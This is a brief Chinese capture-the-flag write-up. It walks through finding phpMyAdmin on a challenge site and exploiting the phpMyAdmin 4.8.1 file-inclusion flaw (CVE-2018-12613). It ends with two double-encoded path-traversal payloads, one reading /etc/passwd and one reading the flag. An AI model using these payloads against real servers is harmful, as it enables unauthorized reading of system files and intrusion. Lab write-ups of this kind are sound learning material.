一开始打开是乱码

之前题目做过修复乱码的，得到这个

用dirsearch扫一下

一开始我是看到robots.txt

访问一下

访问一下phpinfo

也没啥，看到phpmyadimin

访问一下

没啥思路，看了wp

看到phpMyAdmin 4.8.1后台文件包含漏洞（CVE-2018-12613）https://blog.csdn.net/qq_45521281/article/details/105780497

直接利用

?target=db_datadict.php%253f/../../../../../../../../etc/passwd

 

/?target=db_datadict.php%253f../../../../../../../../../../flag